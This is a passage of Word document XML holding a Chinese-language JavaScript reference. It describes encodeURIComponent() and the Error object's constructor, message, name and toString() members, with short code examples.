        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>unescape()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="656" w:name="encodeURIComponent__"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>encodeURIComponent</w:t>
      </w:r>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="656"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>转义</w:t>
      </w:r>
      <w:r>
        <w:t>URI</w:t>
      </w:r>
      <w:r>
        <w:t>组件中的字符</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>encodeURIComponent(s)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个包含</w:t>
      </w:r>
      <w:r>
        <w:t>URI</w:t>
      </w:r>
      <w:r>
        <w:t>一部分或其他待编码文本的字符串。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s</w:t>
      </w:r>
      <w:r>
        <w:t>的一个副本，某些字符已替换为十六进制转义序列。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>异常</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>URIError</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>表示</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>包含非法的</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>代理项对，不能编码。</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encodeURIComponent()</w:t>
      </w:r>
      <w:r>
        <w:t>是一个全局函数，返回它的参数</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>的一个编码后的副本。</w:t>
      </w:r>
      <w:r>
        <w:t>ASCII</w:t>
      </w:r>
      <w:r>
        <w:t>字母和数字以及下面这些</w:t>
      </w:r>
      <w:r>
        <w:t>ASCII</w:t>
      </w:r>
      <w:r>
        <w:t>标点字符将不会编码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>-_.!</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>*'()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>所有其他字符，包括如</w:t>
      </w:r>
      <w:r>
        <w:t>“/”</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>“:”</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>“#”</w:t>
      </w:r>
      <w:r>
        <w:t>等用于分隔</w:t>
      </w:r>
      <w:r>
        <w:t>URI</w:t>
      </w:r>
      <w:r>
        <w:t>的多个组件的标点字符，都将被替换为一个或多个十六进制的转义序列。关于编码机制的描述可参阅</w:t>
      </w:r>
      <w:r>
        <w:t>encodeURI()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意</w:t>
      </w:r>
      <w:r>
        <w:t>encodeURIComponent()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>encodeURI()</w:t>
      </w:r>
      <w:r>
        <w:t>之间的差别：</w:t>
      </w:r>
      <w:r>
        <w:t>encodeURIComponent()</w:t>
      </w:r>
      <w:r>
        <w:t>假设它的参数是</w:t>
      </w:r>
      <w:r>
        <w:t>URI</w:t>
      </w:r>
      <w:r>
        <w:t>的一部分（如协议、主机名、路径或查询字符串）。因此，它将那些用于分隔</w:t>
      </w:r>
      <w:r>
        <w:t>URI</w:t>
      </w:r>
      <w:r>
        <w:t>不同部分的标点字符也转义了。</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 xml:space="preserve">encodeURIComponent("hello </w:t>
      </w:r>
      <w:r>
        <w:t>world?");//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>hello%20world%3F</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decodeURI()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>decodeURIComponent()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>encodeURI()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>escape()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>unescape()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="657" w:name="Error"/>
      <w:r>
        <w:t>Error</w:t>
      </w:r>
      <w:bookmarkEnd w:id="657"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个一般性的异常</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>→</w:t>
      </w:r>
      <w:r>
        <w:t>错误</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Error()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>new 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t>message</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一条可选的错误消息，用于提供关于该异常的细节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个新构建的</w:t>
      </w:r>
      <w:r>
        <w:t>Error</w:t>
      </w:r>
      <w:r>
        <w:t>对象。如果指定</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>参数，则该</w:t>
      </w:r>
      <w:r>
        <w:t>Error</w:t>
      </w:r>
      <w:r>
        <w:t>对象将把它用做它的</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值；其他情况下，它将使用一个预定义的默认字符串作为该属性的值。当不使用</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>操作符，直</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>接将</w:t>
      </w:r>
      <w:r>
        <w:t>Error()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数像一个函数一样调用时，它的行为和带</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>操作符调用时一样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>message</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>提供关于该异常的细节的一条错误消息。这个属性的值为传给构造函数的字符串或一个预定义的默认字符串。</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一个指定该异常的类型的字符串。对</w:t>
      </w:r>
      <w:r>
        <w:t>Error</w:t>
      </w:r>
      <w:r>
        <w:t>类和它所有的子类而言，这个属性指定了用于创建该实例的构造函数</w:t>
      </w:r>
      <w:r>
        <w:t>的名字。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回一个表示该</w:t>
      </w:r>
      <w:r>
        <w:t>Error</w:t>
      </w:r>
      <w:r>
        <w:t>对象的预定义字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Error</w:t>
      </w:r>
      <w:r>
        <w:t>类的实例表示的错误或异常通常与</w:t>
      </w:r>
      <w:r>
        <w:t>throw</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>try/catch</w:t>
      </w:r>
      <w:r>
        <w:t>语句一起使用。</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>属性指明该异常的类型，</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>属性则提供了关于该异常的人类可读的细节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>解释器永远不会直接抛出</w:t>
      </w:r>
      <w:r>
        <w:t>Error</w:t>
      </w:r>
      <w:r>
        <w:t>对象，它只会抛出</w:t>
      </w:r>
      <w:r>
        <w:t>Error</w:t>
      </w:r>
      <w:r>
        <w:t>的某个子类的实例，如</w:t>
      </w:r>
      <w:r>
        <w:t>SyntaxError</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>RangeError</w:t>
      </w:r>
      <w:r>
        <w:t>。在自己的代码中，抛出</w:t>
      </w:r>
      <w:r>
        <w:t>Error</w:t>
      </w:r>
      <w:r>
        <w:t>对象来发出异常信号可能更方便，或者可以简单地使用一个原始字符串或数值来抛出一条</w:t>
      </w:r>
      <w:r>
        <w:t>错误消息或一个错误代码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，虽然</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>标准为</w:t>
      </w:r>
      <w:r>
        <w:t>Error</w:t>
      </w:r>
      <w:r>
        <w:t>类定义一个</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法（并且</w:t>
      </w:r>
      <w:r>
        <w:t>Error</w:t>
      </w:r>
      <w:r>
        <w:t>的所有子类都继承了这个方法），但它并不要求这个</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法返回的字符串包含</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>属性的内容。因此，不要期望</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法会将一个</w:t>
      </w:r>
      <w:r>
        <w:t>Error</w:t>
      </w:r>
      <w:r>
        <w:t>对象转换为一个有意义的、人类可读的字符串。向用户显示错误消息时，应该显式地使用该</w:t>
      </w:r>
      <w:r>
        <w:t>Error</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>示例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以像下面这样发出异常信号：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function factorial(x){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(x</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>0)throw new Error("factorial:x must be</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>=0");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(x</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=1)return 1;else return x*factorial(x-1);</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lastRenderedPageBreak/>
        <w:t>如果捕获一个异常，则可以使用类似下面的代码向用户显示（这儿使用客户端的</w:t>
      </w:r>
      <w:r>
        <w:t>Window.alert()</w:t>
      </w:r>
      <w:r>
        <w:t>方法）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>try{</w:t>
      </w:r>
      <w:r>
        <w:t>＆</w:t>
      </w:r>
      <w:r>
        <w:t>*(</w:t>
      </w:r>
      <w:r>
        <w:t>＆</w:t>
      </w:r>
      <w:r>
        <w:t>/*</w:t>
      </w:r>
      <w:r>
        <w:t>这儿将抛出一个异常</w:t>
      </w:r>
      <w:r>
        <w:t>*/}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>catch(e){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(e instanceof Error){//</w:t>
      </w:r>
      <w:r>
        <w:t>它是</w:t>
      </w:r>
      <w:r>
        <w:t>Error</w:t>
      </w:r>
      <w:r>
        <w:t>或其子类的实例吗？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>alert(e.name+":"+e.message);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</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EvalError</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>RangeError</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>ReferenceError</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>SyntaxError</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>TypeError</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>URIError</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="658" w:name="Error_message"/>
      <w:r>
        <w:t>Error.message</w:t>
      </w:r>
      <w:bookmarkEnd w:id="658"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>人类可读的错误消息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>error.message</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Error</w:t>
      </w:r>
      <w:r>
        <w:t>对象（或</w:t>
      </w:r>
      <w:r>
        <w:t>Error</w:t>
      </w:r>
      <w:r>
        <w:t>的任何子类的实例）的</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>属性用于包含一个人类可读的字符串，提供了关于发生的错误或异常的细节。</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>如果向</w:t>
      </w:r>
      <w:r>
        <w:t>Error()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数传入</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>参数，则该参数将会是这个</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值。如果没有传入</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>参数，则</w:t>
      </w:r>
      <w:r>
        <w:t>Error</w:t>
      </w:r>
      <w:r>
        <w:t>对象的这个</w:t>
      </w:r>
      <w:r>
        <w:t>属性将继承预定义的默认值（可能是空字符串）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="659" w:name="Error_name"/>
      <w:r>
        <w:t>Error.name</w:t>
      </w:r>
      <w:bookmarkEnd w:id="659"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>错误的类型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>error.name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Error</w:t>
      </w:r>
      <w:r>
        <w:t>对象（或</w:t>
      </w:r>
      <w:r>
        <w:t>Error</w:t>
      </w:r>
      <w:r>
        <w:t>的任何子类的实例）的</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>属性定义发生的错误或异常的类型。所有</w:t>
      </w:r>
      <w:r>
        <w:t>Error</w:t>
      </w:r>
      <w:r>
        <w:t>对象都从它们的构造函数继承这个属性。这个属性的值和它们的构造函数的名字相同。也就是说，</w:t>
      </w:r>
      <w:r>
        <w:t>SyntaxError</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>属性为</w:t>
      </w:r>
      <w:r>
        <w:t>"SyntaxError"</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>EvalError</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>属性为</w:t>
      </w:r>
      <w:r>
        <w:t>"EvalError"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="660" w:name="Error_toString__"/>
      <w:r>
        <w:t>Error.toString()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="660"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将一个</w:t>
      </w:r>
      <w:r>
        <w:t>Error</w:t>
      </w:r>
      <w:r>
        <w:t>对象转为字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>重写</w:t>
      </w:r>
      <w:r>
        <w:t>Object.toString()</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error.toString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个根据实现预定义的字符串。除了它应该是一个字符串外，</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>标准化没有指定这个方法的返回值的任何信息。值得注意的是，返回的字符串并不要求包含错误名或错误消息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="661" w:name="escape__"/>
      <w:r>
        <w:t>escape()</w:t>
      </w:r>
